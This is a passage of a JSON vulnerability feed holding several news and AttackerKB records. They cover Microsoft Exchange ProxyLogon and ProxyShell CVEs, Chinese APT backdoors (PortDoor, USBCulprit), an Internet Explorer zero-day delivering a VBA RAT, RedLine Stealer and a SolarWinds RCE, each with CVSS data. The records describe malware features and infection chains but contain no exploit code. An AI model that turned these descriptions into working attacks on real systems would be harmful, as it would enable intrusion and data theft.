Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n\n**ProxyOracle:**\n\n * [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)\n * [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)\n\n**ProxyShell:**\n\n * [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)\n * [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)\n * [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)\n\n**Other:**\n\n * [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)\n\nOriginally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T09:46:00", "type": "thn", "title": "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T09:46:09", "id": "THN:FA40708E1565483D14F9A31FC019FCE1", "href": "https://thehackernews.com/2021/08/hackers-actively-searching-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T07:34:00", "type": "thn", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-05-03T16:14:45", "id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-I2pNCdG5Z4Q/YQLGX235y6I/AAAAAAAADYo/5ghaW_-O9UcVkr2h1ElM9OK55A4BtxsUwCLcBGAsYHQ/s0/malware-attack.jpg>)\n\nAn unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an \"unusual\" campaign.\n\nThe backdoor is distributed via a decoy document named \"Manifest.docx\" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. \n\nThe malware-laced document claims to be a \"Manifesto of the inhabitants of Crimea\" calling on the citizens to oppose Russian President Vladimir Putin and \"create a unified platform called 'People's Resistance.'\"\n\nThe Internet Explorer flaw, tracked as **CVE-2021-26411**, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to [target security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development.\n\nEarlier this February, South Korean cybersecurity firm ENKI [revealed](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. Microsoft [addressed the issue](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) as part of its Patch Tuesday updates for March.\n\n[](<https://thehackernews.com/images/-lZ4BcbcuZ5w/YQLCARxT1bI/AAAAAAAADYg/ng5r_-f-4f0B0RS2Mf-rIkCbF0u_7vKTQCLcBGAsYHQ/s0/malware.jpg>)\n\nThe Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines.\n\n\"While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,\" Malwarebytes researcher Hossein Jazi said in a [report](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) shared with The Hacker News. \"The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets.\"\n\nBesides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server.\n\nAlso discovered by Malwarebytes is a PHP-based panel nicknamed \"Ekipa\" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT.\n\n\"As the [conflict between Russia and Ukraine](<https://en.wikipedia.org/wiki/Russo-Ukrainian_War>) over Crimea continues, cyber attacks have been increasing as well,\" Jazi said. \"The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-29T15:18:00", "type": "thn", "title": "Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:18:26", "id": "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "href": "https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoNnACNL4tRXhmeRID1KNB0_0j084PU17zaVDx1SxcV1CFt2BlV43KNXnZkDDAR985mEgiQcsym3EvrPBUSnvxY2MeEYVkQM4xXlSNUzbLB98CzlGZ4a9VsE0crb-4OSGd6167GXHRqsv_Q1nVk-reN0Jwy6FUir34MAXaXtejrxv4Fdin_zG4w0Hy/s728-e100/Malware-botnet.jpg>)\n\nA new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.\n\n\"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server,\" Bitdefender [said](<https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/>) in a new report shared with The Hacker News.\n\nMost of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others.\n\nExploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware.\n\nThe primary infection method used by attackers to distribute exploit kits, in this case the [Rig Exploit Kit](<https://blog.talosintelligence.com/2016/11/rig-exploit-kit-campaign-happy-puzzling.html>), is through compromised websites that, when visited, drops the exploit code to ultimately send the RedLine Stealer payload to carry out follow-on attacks.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTiqBiBM_tUQDifo7wSzoSmySElE7plr5n8i313DuMqdGIvgxgtI8BwkXKvGn9BhTFJbL5wO3nEo5epjh_wK6NXHiY5HX4H-zBXR1biJrlrDoHMp0kOD9TpOFTAquH1yuDwBTqaA8sHb5ykwjftMSl6orvCwshZvLvvUeR9n89rn2ExztZfMlrZ9Zz/s728-e100/malware-redline.jpg>)\n\nThe flaw in question is [CVE-2021-26411](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) (CVSS score: 8.8), a memory corruption vulnerability impacting Internet Explorer that has been [previously](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) [weaponized](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) by North Korea-linked threat actors. It was addressed by Microsoft as part of its Patch Tuesday updates for March 2021.\n\n\"The RedLine Stealer sample delivered by RIG EK comes packed in multiple encryption layers [...] to avoid detection,\" the Romanian cybersecurity firm noted, with the unpacking of the malware progressing through as many as six stages.\n\nRedLine Stealer, an information-stealing malware sold on underground forums, comes with features to exfiltrate passwords, cookies and credit card data saved in browsers, as well as crypto wallets, chat logs, VPN login credentials and text from files as per commands received from a remote server.\n\nThis is far from the only campaign that involves the distribution of RedLine Stealer. In February 2022, HP [detailed](<https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/>) a social engineering attack using fake Windows 11 upgrade installers to trick Windows 10 users into downloading and executing the malware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-28T08:20:00", "type": "thn", "title": "New RIG Exploit Kit Campaign Infecting Victims' PCs with RedLine Stealer", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2022-04-28T08:20:39", "id": "THN:4225CEE6D7775276254C20B6E19126AE", "href": "https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-10-04T22:44:09", "description": "The Collector Service in SolarWinds Orion Platform before 2020.2.4 uses MSMQ (Microsoft Message Queue) and doesn\u2019t set permissions on its private queues. As a result, remote unauthenticated clients can send messages to TCP port 1801 that the Collector Service will process. Additionally, upon processing of such messages, the service deserializes them in insecure manner, allowing remote arbitrary code execution as LocalSystem.\n\n \n**Recent assessments:** \n \n**wvu-r7** at February 05, 2021 10:45pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/GuXRxDl2UG/cve-2021-25274#rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-03T00:00:00", "type": "attackerkb", "title": "SolarWinds Orion Platform Unauthenticated RCE (CVE-2021-25274)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276"], "modified": "2021-02-09T00:00:00", "id": "AKB:4D8A45D9-93E7-4267-B52C-96AB82DF5A06", "href": "https://attackerkb.com/topics/GuXRxDl2UG/solarwinds-orion-platform-unauthenticated-rce-cve-2021-25274/rapid7-analysis", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-21T17:14:30", "description": "Microsoft disclosed four actively exploited zero-day vulnerabilities being used to attack on-premises versions of Microsoft Exchange Server. The vulnerabilities identified are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which affect Microsoft Exchange Server. Exchange Online is not affected.\n\nIn the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 03, 2021 4:10pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\n**NinjaOperator** at June 29, 2021 9:51pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "attackerkb", "title": "Multiple Microsoft Exchange zero-day vulnerabilities - ProxyLogon Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-09T00:00:00", "id": 